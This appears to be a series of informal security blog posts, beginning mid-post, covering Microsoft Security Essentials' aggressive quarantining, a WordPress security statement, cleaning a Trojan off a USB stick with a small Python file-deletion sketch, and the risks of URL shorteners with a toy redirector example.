MSE also said it quarantined fifteen messages from my email for having JavaScript shell code.  Unfortunately, it didn’t say what they were, and I wasn’t sure I could get them back.  I don’t know why they were deleted, or what the trigger was.  MSE isn’t too big on reporting details.  I don’t know whether these messages were simply ones that contained some piece of generic JavaScript, and got boosted up to “severe” level.  Given the EICAR test file experience, I’m not inclined to give Microsoft the benefit of the doubt.

After some considerable work, I did find them.  They seemed to be the “suspect” messages that Microsoft wanted.  And when I tried to recover them, I found that MSE had not quarantined them: they were left in place.  So, at the very least, at times MSE lies to you.

(I guess I’d better add my email directory to places for MSE not to scan.)
MSE quarantined some old DOS utilities.  It quarantined a bunch of old virus simulators (the ones that show you screen displays, not actual infectors).  (Called them weird names, too.)

MSE quarantined Gibson Research’s DCOMbob.exe.  This is a tool for making sure that DCOM is disabled on your machine.  Since DCOM was the vector for the Blaster worm (among others), and is really hard to turn off under XP, I find this rather dangerous.

OK, final word is that I can use it.  I’ll want to protect certain areas before I do, but that shouldn’t be too much of a concern for most users.

You might want to make sure Microsoft isn’t reading your email …


WordPress: we are protecting your blog

As the WordPress team scramble around trying to resolve the latest set of security issues, doing all the wrong things (like giving their users a 14-step upgrade process), the following jewel came up:

4. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in web security. This attack was well anticipated and so far, WordPress 2.8.4 is holding. If necessary, WordPress will immediately release a update with further security improvements. WordPress is used by governments, huge corporations, and me, around the world. Millions of bloggers are using Have faith they are working overtime to monitor this situation and protect your blog.

This is funny on so many levels.
(HT: Jericho, AKA security curmudgeon)


I am carrier

The swine flu craze in Asia is almost becoming ridiculous. When we flew into Beijing, a doctor came on board to check everyone’s temperature before they would let us off the plane. Before passing immigration we were checked again and filled in forms to prove we were all in top health.

Ironically, on the inbound flight to Beijing I caught the flu from the Chinese girl sitting next to me (I’m talking about the regular flu. No need to call an emergency medical team on me). I spent the week gobbling Chinese herbal medicine, which did a great job of keeping me from crashing sick. But the problem is that I am about to fly back to San Francisco through Tokyo, and I’m trying to think how to convince the Narita officials that my germs are pure, genuine Asian ones and were not carried with me from any American pigs (political innuendos not intended).

It seems I’m also a carrier of something else, and again it’s not my fault. All I did was connect my USB stick to a computer in the business center of my Beijing hotel. I just wanted to print a document, but I didn’t bother locking the stick to ‘read only’. Apparently that was enough for a Trojan to infect the USB stick from the malware-infested public computer.

Not that it would matter, really, since my machine runs Ubuntu. In fact, I wouldn’t have noticed it if someone who borrowed the USB stick from me hadn’t shown me the virus warning that popped up as they plugged the stick into their Windows machine. I could have infected dozens of machines by the time I found out about it – all those poor Windows machines, Trojaned just for borrowing my USB stick; I really don’t need that on my conscience.

Now that I know the Trojan is there, the cleanup is easy: I will ‘rm’ the files and the stick will be healthy again and stop being a carrier to defenseless Windows machines. Now if only it were that easy to recover from this damn flu.
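For the record, the cleanup really does amount to deleting the dropped files from the mounted stick. A minimal sketch in Python, assuming an autorun-style Trojan; the mount point and file names here are stand-ins for illustration (a real stick on Ubuntu would mount somewhere like /media/, and the payload name would differ):

```python
import os

# Stand-in for the USB stick's mount point; the file names below are
# hypothetical examples of what an autorun-style infection leaves behind.
usb = "/tmp/usb-demo"
os.makedirs(usb, exist_ok=True)
for name in ("autorun.inf", "payload.exe", "report.doc"):
    open(os.path.join(usb, name), "w").close()

# autorun.inf is what tells Windows to execute the payload when the
# stick is inserted; removing it and the payload is the whole cleanup.
for name in ("autorun.inf", "payload.exe"):
    path = os.path.join(usb, name)
    if os.path.exists(path):
        os.remove(path)

print(sorted(os.listdir(usb)))  # only the legitimate document is left
```

Of course, locking the stick to read-only before plugging it into an untrusted machine prevents the infection in the first place.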


To tinyurl or not to, that is the question …

Dinosaur that I am, it never occurred to me that long URLs were a major problem.  Sure, I’d gotten lots that were broken, particularly after going through Web-based mailing lists.  But you could generally put them back together again with a few mouse clicks.  So what?

So the fact that there were actually sites that would allow you to proactively pre-empt the problem, by shortening the URL, came as a surprise.  What was even more of a surprise was that there were lots of them.  Go ahead.  Do a search on “+shorten +url” and see what you get.  Thousands.

I would not, by the way, advise visiting that last.  .cc is a domain used by those on the dark side.  In fact, I wouldn’t recommend visiting many of those: I have no idea where they came from, except that a search pops them up.  Which is part of the point.

Are URL shorteners a good thing?  Joshua Schachter says no.  Therefore, in opposition, Ben Parr says yes.  There are legitimate points to be made on both sides.  They add complexity to the process.  (Shorteners aren’t shorteners: they are redirectors.)  They make it easier to tweet (and marginally easier to email).  They disguise spam.  Some of the sites give you link use data.  They create another failure point.  They hide the fact that most Twitter users are, in fact, posting exactly the same link as 49,000 other Twitter users.
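That “shorteners aren’t shorteners: they are redirectors” point is worth making concrete. At its core such a service is just a table mapping a short code to a long URL, answered with an HTTP 301. A toy sketch (the names here are illustrative, not any real service’s API):

```python
import hashlib

class Redirector:
    """Toy URL 'shortener': really just a lookup table plus a redirect."""

    def __init__(self):
        self.table = {}

    def shorten(self, long_url):
        # A hash-derived code is deterministic: the same long URL always
        # yields the same short code, so duplicate submissions collapse
        # into one entry.
        code = hashlib.sha256(long_url.encode()).hexdigest()[:7]
        self.table[code] = long_url
        return code

    def resolve(self, code):
        # A real service answers this lookup with "301 Moved Permanently"
        # and a Location: header; nothing is shortened, only redirected.
        return self.table.get(code)

r = Redirector()
code = r.shorten("http://example.com/a/very/long/path?with=parameters")
print(code == r.shorten("http://example.com/a/very/long/path?with=parameters"))  # True
```

The extra hop in the middle is exactly the added complexity, failure point, and disguise opportunity described above.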

URL shorteners/redirectors are going to be used: that is a given.  Now that they’re here, they are not going away.  Those of pure heart and altruistic (or, at least, merely monetary) motive will provide the services, have reasonable respect for privacy, and add functions such as providing link use data to the originator (and, possibly, the user).  A number of the sites will be set up to install malware on the originator’s machine, to preferentially try to break the Websites identified, to mine and cross-correlate URL and use data, and to redirect users to malicious sites.

If you are going to use them (and you are, I can tell), then choose wisely, grasshopper.  There are lots to choose from.  Choose sites that offer preview capabilities.  If someone doesn’t use the preview options, you can still add them. is the same as : you just have to add the “preview.” part. is even easier: just add a hyphen to the end of the shortened URL.  I’m hoping that one of the sites will start checking the database for already existing links, and returning the same “short form”: it’d make it easier to identify all the identical tweets.  (With the increasing use of the sites, it will also ensure that the hash space doesn’t expand too quickly, which would be to the advantage of the shortening sites.)
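The preview tricks alluded to above are simple string transformations. A sketch, assuming one service that (like TinyURL) supports a “preview.” host prefix and another that shows the destination when a hyphen is appended; confirm the convention for whatever service you actually use:

```python
from urllib.parse import urlsplit, urlunsplit

def preview_by_prefix(short_url):
    # e.g. http://tinyurl.com/abc123 -> http://preview.tinyurl.com/abc123
    parts = urlsplit(short_url)
    return urlunsplit(parts._replace(netloc="preview." + parts.netloc))

def preview_by_suffix(short_url):
    # some services show a preview page if you append a hyphen
    return short_url + "-"

print(preview_by_prefix("http://tinyurl.com/abc123"))
# -> http://preview.tinyurl.com/abc123
```

Either way you get to see where the redirect points before you commit to following it.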